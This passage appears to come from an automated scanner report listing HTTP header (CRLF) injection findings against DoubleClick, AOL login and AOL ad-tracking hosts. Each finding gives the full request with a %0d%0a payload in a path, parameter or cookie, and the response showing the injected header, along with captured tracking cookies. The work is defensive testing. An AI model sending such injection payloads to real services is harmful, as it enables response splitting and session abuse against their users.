Path:   /ad/huffpost.boomerangpixel/bingmodule

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c394%0d%0a997748dc239 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c394%0d%0a997748dc239/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;load_mode=inline;page_type=bpage;pos=boomerang;hot=fb;hot=tw;u=1x1%7Cbpage%7Cboomerang%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7C%7C840995%7C%7C%7C%7C;dcove=r;sz=1x1;tile=4;ord=5299499505? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c394
997748dc239
/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-:
Date: Sat, 26 Mar 2011 20:36:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12a6e%0d%0a3cb4ffd24b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12a6e%0d%0a3cb4ffd24b0/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12a6e
3cb4ffd24b0
/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Sat, 26 Mar 2011 13:14:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15f52%0d%0a4fdade80305 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15f52%0d%0a4fdade80305/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15f52
4fdade80305
/N5956.Google/B3941858.12;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Fri, 25 Mar 2011 19:19:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 26fba%0d%0a2a7290e692e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /26fba%0d%0a2a7290e692e/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26fba
2a7290e692e
/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died:
Date: Sat, 26 Mar 2011 20:36:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adj/N6036.AOL/B5125476.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6036.AOL/B5125476.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4d9cf%0d%0a87bb4119c15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4d9cf%0d%0a87bb4119c15/N6036.AOL/B5125476.4;sz=728x90;click=http%3A//at.atwola.com/adlink%2F5113%2F674622%2F0%2F225%2FAdId%3D1349284%3BBnId%3D3%3Bitime%3D171780247%3Bkvugc%3D0%3Bkvpg%3Dmusic.aol%2Fradioguide%2Fbb%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93232707%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D73001%3Bkvseg%3D99999%3A61674%3A60489%3A60740%3A60490%3A56262%3A61576%3A60493%3A50963%3A60491%3A60515%3A60514%3A52614%3A53656%3A52842%3A56830%3A52615%3A60546%3A56918%3A60500%3A56920%3A56555%3A51133%3A56988%3A56917%3A53435%3A54173%3A56500%3A52611%3A54463%3A56969%3Bkp%3D-1%3Bnodecode%3Dyes%3Blink%3D;ord=171780247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4d9cf
87bb4119c15
/N6036.AOL/B5125476.4;sz=728x90;click=http: //at.atwola.com/adlink/5113/674622/0/225/AdId=1349284;BnId=3;itime=171780247;kvugc=0;kvpg=music.aol/radioguide/bb;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93232707;kvtid=16lsqii1n1a3cr;kr2703=73001;kvseg=99999:61674:60489:60740:60490:56
Date: Sat, 26 Mar 2011 20:36:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/longpost

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 47115%0d%0af411b5489be was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /47115%0d%0af411b5489be/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=mid_article;hot=fb;hot=tw;u=300x250%7Cbpage%7Cmid_article%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250;tile=3;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/47115
f411b5489be
/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-:
Date: Sat, 26 Mar 2011 20:36:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 234dc%0d%0a00fe8347eca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /234dc%0d%0a00fe8347eca/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;hot=fb;hot=tw;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250,300x600;tile=5;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/234dc
00fe8347eca
/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died:
Date: Sat, 26 Mar 2011 20:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f0b8d%0d%0aafccb6f9a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3a187531a0-71f6-4ddd-8234-25df9b0c705b&offerId=newmail-en-us-v2&seamless=novl&f0b8d%0d%0aafccb6f9a=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; SNS_LDC=1&-&-&1299520397&1&1299520397&0; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 20:37:23 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?f0b8d
afccb6f9a
=1&seamless=novl&locale=us&offerId=newmail-en-us-v2&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3A187531a0-71f6-4ddd-8234-25df9b0c705b&authLev=0&sitedomain=sns.webmail.aol.com&lang=en
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"


4.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 66e42%0d%0aa76191a841c was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a86866e42%0d%0aa76191a841c; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:52:16 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:16 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776636; path=/; expires=Sat, 02-Apr-11 20:37:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173636|16768^1301171786^1301173636; path=/; expires=Sat, 26-Mar-11 21:07:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a07761c4014e52e7e1bc39b6a051a86866e42
a76191a841c
,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:16 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...

4.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 29cb8%0d%0ab6126af3077 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=29cb8%0d%0ab6126af3077&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
